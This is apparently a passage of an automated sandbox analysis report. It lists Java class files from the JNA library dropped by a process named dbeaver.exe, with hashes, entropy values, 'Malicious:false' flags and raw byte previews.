      Preview:.......2....z.................................................................................................................................................................................1....1....1...................... .!..".#..$.. .%..&..'..(....)..*..+....,....-.....F..../..F.0..F.1..2..3..4..5..6..7..8..9..:..;....<....=..>..?..@..A..B....C.....D..E..F..G..H..I..J..K..L....M..N..O..P....Q..R....S....T....U....V..W..X..Y....Z..[....\....]....^...._..`...UNSPECIFIED...I...ConstantValue........MAC........LINUX........WINDOWS........SOLARIS........FREEBSD........OPENBSD........WINDOWSCE........AIX........ANDROID........GNU........KFREEBSD........NETBSD........RO_FIELDS...Z...HAS_BUFFERS...HAS_AWT...HAS_JAWT...MATH_LIBRARY_NAME...Ljava/lang/String;...C_LIBRARY_NAME...HAS_DLL_CALLBACKS...RESOURCE_PREFIX...osType...ARCH...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/Platform;...getOSType...()I...isMac...()Z...StackMapTable...isAndroid...isLinux...is
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):193
      Entropy (8bit):4.750596557006375
      Encrypted:false
      SSDEEP:
      MD5:D2662476AC8552CC2BD2701F98421033
      SHA1:73DDAC8B883BA474F07179A1DD63057BA0B3DC22
      SHA-256:B58ADE536217AE853F144AFEBCC5FC030EB066608A0FF2BE9767E46E1C5AAF66
      SHA-512:160AD9B31DD6C8B2CD2613A37B79D1E60C7773C24118EF6B7841A3FC6690CAFCE26A249F4546FB396AEAD3C98DBCF451E0F2652B75D148E0B4359D93CC349666
      Malicious:false
      Reputation:unknown
      Preview:.......2...........SourceFile...Pointer.java...EnclosingMethod......com/sun/jna/Pointer$1...InnerClasses...java/lang/Object...com/sun/jna/Pointer. ..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):6000
      Entropy (8bit):4.4400706899366424
      Encrypted:false
      SSDEEP:
      MD5:1F1AB83C0DED8EB8AF9A0D71796D4D0B
      SHA1:0C379CC65DDD2E4E4B664DEB0BB8B2B977902659
      SHA-256:CEDE48705622781489A110DAB0493D6255DFCC1616620912C852FB30C8993A48
      SHA-512:10B6DAD39A030B16F2CF0150F78024143B9DEA90818B3C8AFE5A0E612AE146737413E0E521C6704851174DCF5AE0228D2E988B169290EA28208A396C4E34CF0B
      Malicious:false
      Reputation:unknown
      Preview:.......2......{....{..|....}..~..................................................MSG...Ljava/lang/String;...<init>...(J)V...Code...LineNumberTable...LocalVariableTable...this...Opaque...InnerClasses...Lcom/sun/jna/Pointer$Opaque;...peer...J...share...(JJ)Lcom/sun/jna/Pointer;...offset...size...clear...indexOf...(JB)J...value...B...read...(J[BII)V...bOff...buf...[B...index...I...length...(J[CII)V...[C...(J[SII)V...[S...(J[III)V...[I...(J[JII)V...[J...(J[FII)V...[F...(J[DII)V...[D...(J[Lcom/sun/jna/Pointer;II)V...[Lcom/sun/jna/Pointer;...write...getByteBuffer...(JJ)Ljava/nio/ByteBuffer;...getByte...(J)B...getChar...(J)C...getShort...(J)S...getInt...(J)I...getLong...(J)J...getFloat...(J)F...getDouble...(J)D...getPointer...(J)Lcom/sun/jna/Pointer;...getString..'(JLjava/lang/String;)Ljava/lang/String;...encoding...getWideString...(J)Ljava/lang/String;...setByte...(JB)V...setChar...(JC)V...C...setShort...(JS)V...S...setInt...(JI)V...setLong...(JJ)V...setFloat...(JF)V...F...setDouble...(JD)V.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):22558
      Entropy (8bit):5.7781502018187885
      Encrypted:false
      SSDEEP:
      MD5:92925BB1059982A6D30E67BC4A0B5557
      SHA1:0F84D1D1E37EBD627CC4841D4C594986B61E3767
      SHA-256:4D2E9186FB11F19F42448C049563251AF6B38802262F827D7471CAD0FA433237
      SHA-512:8E679DF73A4815D10B3C9C9D746023C493DDC4A694FF9A90022EF6E43737EED7E0A8F9E406B37ABA5F67F2BCEF361BA03097F4364DBF1EC5121B7CC554FC2809
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................................................................................................................................................................$.................(............(....,............,....0............0....4.......4....7............7....;............;....?............?....................D.........................................N.......Q............T....Q................................................`.......`....`.......`...._.............. .......!.......".......#.......$.......%.......&.."....'..G....(....)....*....+....,....-..J........./..0..1....2....3....4....5....6..7....8.........9....:.........;..<.=..>.?....@....A....B....C..D.......E.F..E.G....H....I..J..K..B....L..$.M..$......N..(.O....P..,.Q....R..0.S....T..4.U..7.V....W..;.X....Y..?.Z....[....\....]....^.._.........`....a....b..c..d....e....f....g....h....i....j....k....l..m..n....o....p....q....r....s....t....V....U....u....v....w....x..D......y....z....{..|..}..B.~..............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2054
      Entropy (8bit):5.112224357701199
      Encrypted:false
      SSDEEP:
      MD5:584238F31605CB1198E97AB6A3B440CB
      SHA1:9EDB2BB98A5ACB26B7B6D248F19DA750095D49EB
      SHA-256:451714D4BF2F5681283830EEF9105C4B74585BE1818349ED0F07E83072AC8E00
      SHA-512:2160AD5E41BD4C8D16EC4C663558CE16A504E4F9414C181BE90EC628FBDCD42F6EDF8D41867758406B897A364211CE2691C001E67EA6ED87DC8380394535B371
      Malicious:false
      Reputation:unknown
      Preview:.......2.W....=....>....?..@....A....B..C.D..E....F....G..H..I....=....J....K..L....J..M....J..N..O...pointer...Lcom/sun/jna/Pointer;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/PointerType;...(Lcom/sun/jna/Pointer;)V...p...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...toNative...()Ljava/lang/Object;...getPointer...()Lcom/sun/jna/Pointer;...setPointer...fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...nativeValue...Ljava/lang/Object;...context...Lcom/sun/jna/FromNativeContext;...pt...StackMapTable...hashCode...()I...equals...(Ljava/lang/Object;)Z...o..@...toString...()Ljava/lang/String;..P...SourceFile...PointerType.java.......H..........com/sun/jna/Pointer..'.(..Q."..R..S.T...com/sun/jna/PointerType..2.3..4.5...NULL...java/lang/StringBuilder..8.9..U.V... (...)...java/lang/Object...com/sun/jna/NativeMapped...java/lang/String...getClass...com/sun/jna/Klass...newInstance..%(Ljava/lang/Cla
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):3115
      Entropy (8bit):5.526086924062273
      Encrypted:false
      SSDEEP:
      MD5:99A9303757D9C80F277343EA91C5542F
      SHA1:B378DE95886FCB2E59B340DBC3778A106511049A
      SHA-256:2484C36F5985EE280B1955ACB5E0F4681B6604B0D39A20BA66541B73EFC18519
      SHA-512:254F2D6DA1F36136AE6B3EEE6220F8639E765CC5ADA73E8F5763DA23CF1D8564CC4D8D9561226397F152C176B0BDE5F174B99E08F399F73C594407BF35BE69D2
      Malicious:false
      Reputation:unknown
      Preview:.......2....#.T..-..U..V..W.X..#.Y..W.Z..$.[..\....]..#.^..#._..#.`..a.b....c..d.e....f..#.g..?....h..#.i..j.k..j.l..m..n....o..p..q..r....]....s..t.u....v....b..w..x..z...encoding...Ljava/lang/String;...natives...Ljava/util/List;...Signature..,Ljava/util/List<Lcom/sun/jna/NativeString;>;...original...[Ljava/lang/Object;...<init>...([Ljava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/StringArray;...strings...[Ljava/lang/String;...([Ljava/lang/String;Z)V...wide...Z...StackMapTable..6..n..(([Ljava/lang/String;Ljava/lang/String;)V...([Lcom/sun/jna/WString;)V...[Lcom/sun/jna/WString;..(([Ljava/lang/Object;Ljava/lang/String;)V...ns...Lcom/sun/jna/NativeString;...p...Lcom/sun/jna/Pointer;...i...I..w..}...read...()V...s...Ljava/lang/Object;...si...returnWide..~...toString...()Ljava/lang/String;...SourceFile...StringArray.java....7...com/sun/jna/NativeString...--WIDE-STRING--.......Q....@....F........java/util/ArrayList....J..(.)..,.-..&.'..~..P.Q.........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):775
      Entropy (8bit):4.995163053880802
      Encrypted:false
      SSDEEP:
      MD5:3E6D8A7A9AF4EA8CB2D3F1CE02BDA84D
      SHA1:CAF08CD5BC048DE4B0DAA9B07B8BF012ABCF4F31
      SHA-256:07453629AB3C64F1C5B5DE08FB50B40831BE8C65E22522E183DD8A8C6E37EA77
      SHA-512:2E08AC5E6E04333B54342093185931D118F34331CF44E280829583E9FCF4A077ABA524C59C029A52F3C5ACFAFD21470B18338E8FCB06E8DA9E0F235754B31B4C
      Malicious:false
      Reputation:unknown
      Preview:.......2.............................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Structure$1;...initialValue...()Ljava/util/Map;...Signature..?()Ljava/util/Map<Lcom/sun/jna/Pointer;Lcom/sun/jna/Structure;>;...()Ljava/lang/Object;..VLjava/lang/ThreadLocal<Ljava/util/Map<Lcom/sun/jna/Pointer;Lcom/sun/jna/Structure;>;>;...SourceFile...Structure.java...EnclosingMethod...........java/util/HashMap........com/sun/jna/Structure$1...java/lang/ThreadLocal...com/sun/jna/Structure.0......................./........*.......................................$...........2...........Y...............................................D.........../........*..................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):773
      Entropy (8bit):4.937721593315724
      Encrypted:false
      SSDEEP:
      MD5:DBC363A5CDD1D88A31F43BE78BF8A2D5
      SHA1:15E956C29951F301E9B07AD6FB4EBB5FEC91B76D
      SHA-256:09BB8050F6DBC4E4D859E430CA477D2C11181D98D339E1C0265D32DC901845D8
      SHA-512:A6888160D4E193850E254CC796942BEE0FC893EE604408138CEE556656E76CAF3A4ADD5994C9AAEA2D838CE877FD5D31DFF313E8B2B5735C593380CD07BD2AAF
      Malicious:false
      Reputation:unknown
      Preview:.......2. ...........................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Structure$2;...initialValue...()Ljava/util/Set;...Signature..*()Ljava/util/Set<Lcom/sun/jna/Structure;>;...()Ljava/lang/Object;..ALjava/lang/ThreadLocal<Ljava/util/Set<Lcom/sun/jna/Structure;>;>;...SourceFile...Structure.java...EnclosingMethod.........."com/sun/jna/Structure$StructureSet...StructureSet........com/sun/jna/Structure$2...java/lang/ThreadLocal...com/sun/jna/Structure.0......................./........*.......................................$...........2...........Y...............................................D.........../........*..........................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):520
      Entropy (8bit):4.806786679965365
      Encrypted:false
      SSDEEP:
      MD5:F76316BFF8701D3F93E8467ACD0AC983
      SHA1:4D2DBD5A8E09FFCF59BE4B86065609FE4D38A0DC
      SHA-256:90FC8B761E4C09BADDBDF08451584635A7DFBADD990619A7D9E511FA635C1106
      SHA-512:316D3A8C6A8EF0476D97EDFEF69608A80C89E0901F3A60E5F1C11DE8E0B298EAB85A088F7F1D9B2DEF9083AA5D04E92B2BFA8A27A7836B0E1C536939B149026E
      Malicious:false
      Reputation:unknown
      Preview:.......2................<init>...(J)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses...Lcom/sun/jna/Structure$3;...peer...J...share...(JJ)Lcom/sun/jna/Pointer;...offset...sz...SourceFile...Structure.java...EnclosingMethod...........com/sun/jna/Structure$3...com/sun/jna/Pointer...com/sun/jna/Structure.0.......................:........*..............................................................@........*...................... ....................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):692
      Entropy (8bit):5.183077919393383
      Encrypted:false
      SSDEEP:
      MD5:C576F10564E2CBA59831B1B4CDF7C012
      SHA1:C8EE4718B8926BE9D959777A3E01E112EFD1F4D8
      SHA-256:DF5E97A9264E1AE9A0CFF634EC0D91700B34809E387AEA99CEEC599EA3CFA3A7
      SHA-512:AA4D676A18DB25192D125C9C7787D572BBE7036370F138678C2C3F8C54EB899AD48DEB3AF0ACFDB0E7DD49207D8232D2B5325813E4204EE2928240550CC4A21E
      Malicious:false
      Reputation:unknown
      Preview:.......2.*.............................. .... .."..#...<init>...(I)V...Code...LineNumberTable...LocalVariableTable...this...AutoAllocated...InnerClasses..%Lcom/sun/jna/Structure$AutoAllocated;...size...I...toString...()Ljava/lang/String;...SourceFile...Structure.java....$..%.&...java/lang/StringBuilder....&...auto-..'.(.......)..#com/sun/jna/Structure$AutoAllocated...com/sun/jna/Memory...(J)V...clear...()V...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...com/sun/jna/Structure. .......................G........*.....*.....................................................................A...........Y........*.................................................................!....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):195
      Entropy (8bit):4.768235407294004
      Encrypted:false
      SSDEEP:
      MD5:08AEAF6FE8BBAC3C8A8B8437AC378C80
      SHA1:6ABF6FF25762FDE28362EA2F4707F237BBF1BD0E
      SHA-256:4037C961635E7C4E070C04DDE31CD8DBCA3B2304AA3805938FE246B9EBF615C9
      SHA-512:FF2148B2D79B336D44B438B2892CAEF3F2D7F062D2F9D3D0788A31FD004A8AB1BD949C66C20390045CDA1D898B97A231FCD6232A464F4A6682B3AFC662F562AC
      Malicious:false
      Reputation:unknown
      Preview:.......2...........SourceFile...Structure.java.....!com/sun/jna/Structure$ByReference...ByReference...InnerClasses...java/lang/Object...com/sun/jna/Structure......................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):187
      Entropy (8bit):4.760392198768376
      Encrypted:false
      SSDEEP:
      MD5:C7F169A749C7967F6E2F08867A3FE571
      SHA1:33DD29D0196515FA4F2502B408172AAAE59DCA1B
      SHA-256:BAB1B90E6FC5454E03F563094132E51ABD99D12C7CA91C9ACAE274524243051A
      SHA-512:8490A2AF5095E2693AFA560C2137D75F092F9C14AFA291C4E2C332FA6527CFE746B3C15C32D4FBC60934CDEFF98988EAC31CA2806913C07785D63AF385A5D484
      Malicious:false
      Reputation:unknown
      Preview:.......2...........SourceFile...Structure.java......com/sun/jna/Structure$ByValue...ByValue...InnerClasses...java/lang/Object...com/sun/jna/Structure......................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1678
      Entropy (8bit):4.879637547214613
      Encrypted:false
      SSDEEP:
      MD5:68A8063B1B11F9D81EBC5F1F2A1C3570
      SHA1:E9F1FB41EA7F4780AE49225E627F07EE15B886D7
      SHA-256:60C673AE407593E0167450635928D0A7B54622F10EF91622CDE3333326E9BC98
      SHA-512:D31514CEE35A026B966D34A8E549DED0E05FF3B93ED1B68008AD98B5C7BEA8D87F82167F4A07373E8C8F9BD76F50759212888EA9D44E24FCC858E73202086E6C
      Malicious:false
      Reputation:unknown
      Preview:.......2.M....:....;....<....=....>....?....@....A....B....C....D....E....F....G..H..I...ffi_type_void...Lcom/sun/jna/Pointer;...ffi_type_float...ffi_type_double...ffi_type_longdouble...ffi_type_uint8...ffi_type_sint8...ffi_type_uint16...ffi_type_sint16...ffi_type_uint32...ffi_type_sint32...ffi_type_uint64...ffi_type_sint64...ffi_type_pointer...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..K...FFIType...InnerClasses...FFITypes..(Lcom/sun/jna/Structure$FFIType$FFITypes;...access$1000...()Lcom/sun/jna/Pointer;...access$1100...access$1200...access$1300...access$1400...access$1500...access$1600...access$1700...access$1800...access$1900...access$2000...access$2100...access$2200...SourceFile...Structure.java..................................................................... ..&com/sun/jna/Structure$FFIType$FFITypes...java/lang/Object..L...com/sun/jna/Structure$FFIType...com/sun/jna/Structure. .............................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):658
      Entropy (8bit):5.113324551515862
      Encrypted:false
      SSDEEP:
      MD5:990979449CD961CC6B8ECBA1D1562B4D
      SHA1:04170E34A56C5028BE33F7A1392FE94F4568526F
      SHA-256:C9EFFB7D7834CA311CEC69910A301C81A376AF09AC06C96963A7A51E7140AA4A
      SHA-512:A0A18AD5789BE203EB2269FB989F1ACEECE3B0E96F0BB6574C393D855F69DA3A4230636D466EFB88F9BBCE156EBEFB30E782497C8D31967344E40AF4B2FBB28F
      Malicious:false
      Reputation:unknown
      Preview:.......2.'........................serialVersionUID...J...ConstantValue............<init>...()V...Code...LineNumberTable...LocalVariableTable...this..!...FFIType...InnerClasses...size_t..&Lcom/sun/jna/Structure$FFIType$size_t;...(J)V...value...SourceFile...Structure.java......."..#.$....%..$com/sun/jna/Structure$FFIType$size_t...com/sun/jna/IntegerType..&...com/sun/jna/Structure$FFIType...com/sun/jna/Native...SIZE_T_SIZE...I...(IJ)V...com/sun/jna/Structure.!.......................................0........*....................................................=........*......................................................................... ............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):10118
      Entropy (8bit):5.983238820043743
      Encrypted:false
      SSDEEP:
      MD5:A2097DAA6C85DC86E4F0E0934E9F21D0
      SHA1:88957F65D3DA85646C4644F0ACEC894AD2D4AAE4
      SHA-256:CF555C72F884D9938F9F726BFFDA7B64FDDFBC4AFC6DA5FF515ADF5E632784E9
      SHA-512:6A53564E0FC6FCC09ACAEBC3DD3DE1F36251AF579E4E33687D1B4529039974BC4E20214181E2A33AC4BCE412733AFBB22D32CB2E64C8767C9C31134936F87E0A
      Malicious:false
      Reputation:unknown
      Preview:.......2..............~.........~....~....~....~....~....~....~....~....~....~.... ........................... ....... ....D...................... ......................<.................................................D......................D....D......... .!..<."..#..$.%..6.&....'....(....)..*..$.+..,.-..../..<.0....1..2..3..4..p.5.. .6....7..8....:....;..<..=.>..?..M....=.@..=./....A....B..C..D..T....E..T.F..T.G..T.H..S.I..J..[....K..]....L..M.._.I..~.N..O.. .7..~.P....Q..h.R..S..j.R..T..l.R..U..n.R..V..p.R..W..r.R..X..$.Y..u.R..Z..w.R..[..\..]..{.R..^...FFIType...InnerClasses.._...FFITypes..`...size_t...typeInfoMap...Ljava/util/Map;...Signature..eLjava/util/Map<Ljava/lang/Class;Ljava/util/Map<Ljava/lang/Integer;Lcom/sun/jna/Structure$FFIType;>;>;...unionHelper..ALjava/util/Map<Ljava/lang/Class;Lcom/sun/jna/Structure$FFIType;>;...ffiTypeInfo..ELjava/util/Map<Lcom/sun/jna/Pointer;Lcom/sun/jna/Structure$FFIType;>;...FFI_TYPE_STRUCT...I...ConstantValue........size..&Lcom/sun/jna/Struct
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):535
      Entropy (8bit):5.0289649580670615
      Encrypted:false
      SSDEEP:
      MD5:3CCF6A4B7F6C31DFCFD125B383D117AE
      SHA1:D5F5CB2BCCD23264CE2E2AFA39A936A3A2EAD5B2
      SHA-256:AA81967A04F7255AA47F960AAE30D050F7AE2CF4C13DE350C375B5C9A94D9882
      SHA-512:607D120A38FF0DFA1D650316A739A36DB9047EF8BA0E9979046C67A0EC0E9523C33857CF74A0D3C94CBB63217B3C8B0626654FF7EA101497D4A39EBAF9EB4AF5
      Malicious:false
      Reputation:unknown
      Preview:.......2..............value...()[Ljava/lang/String;...SourceFile...Structure.java...RuntimeVisibleAnnotations..!Ljava/lang/annotation/Documented;.. Ljava/lang/annotation/Retention;..&Ljava/lang/annotation/RetentionPolicy;...RUNTIME...Ljava/lang/annotation/Target;.."Ljava/lang/annotation/ElementType;...TYPE..... com/sun/jna/Structure$FieldOrder...FieldOrder...InnerClasses...java/lang/Object...java/lang/annotation/Annotation...com/sun/jna/Structure&.................................................e..........[..e..................&.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2339
      Entropy (8bit):5.06428024134858
      Encrypted:false
      SSDEEP:
      MD5:8332BF6B148BA91BD6C9E2D9B788A3F1
      SHA1:543AF5592EF0D8E03E4B9FD1FAF8CC7A50702B85
      SHA-256:82C224D7E4D658C25085E8C5E4AB0FBBFB3968F2DA5D0D6466A25489B2E691C2
      SHA-512:1D0BE4825276A95FE12A4044B822FB7533E6F27ACDF71A4686EFC6112897FBFC7F9766EAE6493D8AF99358F4902D72F456B7FFF1573D54712E7B537685C8323A
      Malicious:false
      Reputation:unknown
      Preview:.......2.Q..?....@....A....B....C....D....E....F....@..G....@..H.I..J..K...size...I...alignment...fields...Ljava/util/Map;...Signature..L...StructField...InnerClasses..FLjava/util/Map<Ljava/lang/String;Lcom/sun/jna/Structure$StructField;>;...alignType...typeMapper...Lcom/sun/jna/TypeMapper;...variable...Z...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...LayoutInfo.."Lcom/sun/jna/Structure$LayoutInfo;...access$200..%(Lcom/sun/jna/Structure$LayoutInfo;)Z...x0...access$300..%(Lcom/sun/jna/Structure$LayoutInfo;)I...access$400...access$500..<(Lcom/sun/jna/Structure$LayoutInfo;)Lcom/sun/jna/TypeMapper;...access$600...access$700..3(Lcom/sun/jna/Structure$LayoutInfo;)Ljava/util/Map;..M...(Lcom/sun/jna/Structure$1;)V...Lcom/sun/jna/Structure$1;...access$402..&(Lcom/sun/jna/Structure$LayoutInfo;I)I...x1...access$502..T(Lcom/sun/jna/Structure$LayoutInfo;Lcom/sun/jna/TypeMapper;)Lcom/sun/jna/TypeMapper;...access$202..&(Lcom/sun/jna/Structure$LayoutInfo;Z)Z...access$602...acces
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1046
      Entropy (8bit):5.048123662809588
      Encrypted:false
      SSDEEP:
      MD5:3B865EBA10B7F435F9580AE7FB4BE482
      SHA1:5E621C7F30C0584998843552B836D80308078719
      SHA-256:580115F23B41DD4B35A716D3C90CBDE9B646AEF846C8E8429B1DCA8B138A5475
      SHA-512:7680F1442DBFB0F282F4E77C6BEDEA0367B50D632E600AE41F9B8610ED790A768685A83A1B7E958FDEBEA7DE964356DD2FCF7431E9D70D1758AF6F3F4C17E253
      Malicious:false
      Reputation:unknown
      Preview:.......2.&.............. .."..#...value...Ljava/lang/Object;...peer...Lcom/sun/jna/NativeString;...<init>...(Ljava/lang/Object;)V...Code...LineNumberTable...LocalVariableTable...this...NativeStringTracking...InnerClasses..,Lcom/sun/jna/Structure$NativeStringTracking;...lastValue...access$002..b(Lcom/sun/jna/Structure$NativeStringTracking;Lcom/sun/jna/NativeString;)Lcom/sun/jna/NativeString;...x0...x1...access$000..H(Lcom/sun/jna/Structure$NativeStringTracking;)Lcom/sun/jna/NativeString;...access$100..@(Lcom/sun/jna/Structure$NativeStringTracking;)Ljava/lang/Object;...SourceFile...Structure.java..............$..%..*com/sun/jna/Structure$NativeStringTracking...java/lang/Object...()V...com/sun/jna/Structure. .......................................F........*...*+.....................................................................;........*+Z............................................................./........*.................................................../........*..................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1230
      Entropy (8bit):5.298922488437991
      Encrypted:false
      SSDEEP:
      MD5:873799F8AE011B31FB18645B8969257C
      SHA1:9795F4C4773B15322130FB31A330B492B690E03D
      SHA-256:C00696E71919655190426A5ACF4760074137E3416C51A1190A02B7ACD4AD0698
      SHA-512:107EC4E7A27A085142B955D1D11DF348A9CF94A7905A8FCEB96A67E4BE86052FC0CBC3C9146BBF1642B07CD3492C307E023C88C4062027575940ADE7437E9567
      Malicious:false
      Reputation:unknown
      Preview:.......2.I....3....4....5..6....3....7....8..9....:..;..<....=....>..?....@..B..C...name...Ljava/lang/String;...type...Ljava/lang/Class;...Signature...Ljava/lang/Class<*>;...field...Ljava/lang/reflect/Field;...size...I...offset...isVolatile...Z...isReadOnly...readConverter..!Lcom/sun/jna/FromNativeConverter;...writeConverter...Lcom/sun/jna/ToNativeConverter;...context...Lcom/sun/jna/FromNativeContext;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...StructField...InnerClasses..#Lcom/sun/jna/Structure$StructField;...toString...()Ljava/lang/String;...SourceFile...Structure.java..&.'.............java/lang/StringBuilder.......D.E...@..D.F...[...] (.......D.G...)../.0..H..!com/sun/jna/Structure$StructField...java/lang/Object...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(I)Ljava/lang/StringBuilder;..-(Ljava/lang/Object;)Ljava/lang/StringBuilder;...com/sun/jna/Structure.!........................................................................... .!.....".#..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2503
      Entropy (8bit):5.2634836619692065
      Encrypted:false
      SSDEEP:
      MD5:F020AD0C7E4C7D045F578452CFDBB013
      SHA1:86248909A849FD834CA6F2A51516F4D3D6576724
      SHA-256:A6AEDFC899BFC10BF5BC79C5CEC88E04B0731A7842ABA23C55A159F012B7C6BD
      SHA-512:6E50A213625BFBEDA25D101043372E9BECA2060FC77441BF16790785DE9AECC08DBCA65F3F946A75D13A36E138543EEBBD45AE5889B1BC0EF3B58A8B0D88B041
      Malicious:false
      Reputation:unknown
      Preview:.......2.d....?....@..A..B.C....D....E....F....G..H.I....J....K..L.M..N.O..P.Q....R..S..T..U...elements...[Lcom/sun/jna/Structure;...count...I...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...StructureSet...InnerClasses..$Lcom/sun/jna/Structure$StructureSet;...ensureCapacity...(I)V...e...size...StackMapTable...getElements...()[Lcom/sun/jna/Structure;...()I...contains...(Ljava/lang/Object;)Z...o...Ljava/lang/Object;...add...(Lcom/sun/jna/Structure;)Z...Lcom/sun/jna/Structure;...indexOf...(Lcom/sun/jna/Structure;)I...s2...i...s1..A...remove...idx...iterator...()Ljava/util/Iterator;......Signature../()Ljava/util/Iterator<Lcom/sun/jna/Structure;>;.._Ljava/util/AbstractCollection<Lcom/sun/jna/Structure;>;Ljava/util/Set<Lcom/sun/jna/Structure;>;...SourceFile...Structure.java.............com/sun/jna/Structure..V..W.X......./.0..(.).. .!..Y..Z.[..#.'..\.]..^.._.)..`..a.b..c..7.8..,.-.."com/sun/jna/Structure$StructureSet...java/util/AbstractCollection...java/util/Set...java
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):39497
      Entropy (8bit):6.05083492672817
      Encrypted:false
      SSDEEP:
      MD5:F99E4E395E9FE61E7266733C5CC39BF9
      SHA1:CC706E207E9BD7A20834CAA73D74D20114C0C9CC
      SHA-256:4DA3AA59F120EB33ADBD7CE3AFE5869642C4FC0046ACBB663831970105C1A776
      SHA-512:04F586AFB4B02126B2F78380FDE6E3FC8A3076C53B3DF38C71DE863F440D46E326D2E00A3DE1E233E84BEEDC23C28829D40A681DF560D8E9E1758457EC5583CD
      Malicious:false
      Reputation:unknown
      Preview:.......2................................4.....................................4...........................................................................................................B............u....u.........u....u........... ..!.."..#..0.$....%....&..'..5....(..5.)..5.*..5.+..0.,....-..u....../..0.1..2....3..4....5....6..@.7..8....9....:..B.;....<..B.=..>.?..@.A..@.B..C....D..@.E..B.F..B.G..H..O.I....F..J..K..L....M..N..5.O..X.$....P....Q..R....S..T.U..V..W..X..Y..c.$..Z..[..u.\..4.\....]....^..O._..O.`..a.b..q.c..d....e..f..g..h..q.i..O.j....k..l..u.m..u.n..u.o..O.p..a.q..r..s....t..O.u....v....w....x..O.y....z....{....|..O.}..O.~.................b..........4.+..............:..u..............................q...................q......................z.\...............q....T....T......7............................................................?..............................X.,.......@.\..................................................................B..............q..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):835
      Entropy (8bit):5.04120222781363
      Encrypted:false
      SSDEEP:
      MD5:6F611C939FB0EDCB54C08BEB30E62186
      SHA1:B793E5EE1DDF40A9F1B34694313668C6F2651817
      SHA-256:56E7424BB8D5E705194E55F55A7132E1C7BD38A0B113FE25282D5119982B499E
      SHA-512:3A454EAE934B869E152765DCEC033ED5651933ED0FFFAD720FB511F1FBF203F66D0154C59FBCB61DC8221D9CAD6B1171F20C065ABB7D174BF868F5363C12A6F8
      Malicious:false
      Reputation:unknown
      Preview:.......2.$.............................structure...Lcom/sun/jna/Structure;...field...Ljava/lang/reflect/Field;...<init>..3(Lcom/sun/jna/Structure;Ljava/lang/reflect/Field;)V...Code...LineNumberTable...LocalVariableTable...this.."Lcom/sun/jna/StructureReadContext;...struct...getStructure...()Lcom/sun/jna/Structure;...getField...()Ljava/lang/reflect/Field;...SourceFile...StructureReadContext.java.. ..!."....#............ com/sun/jna/StructureReadContext...com/sun/jna/FromNativeContext...java/lang/reflect/Field...getType...()Ljava/lang/Class;...(Ljava/lang/Class;)V.!.......................................]........*,......*+...*,...................%...&...'...(..... ............................................./........*...................*.............................../........*...................,............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):732
      Entropy (8bit):4.923638719944952
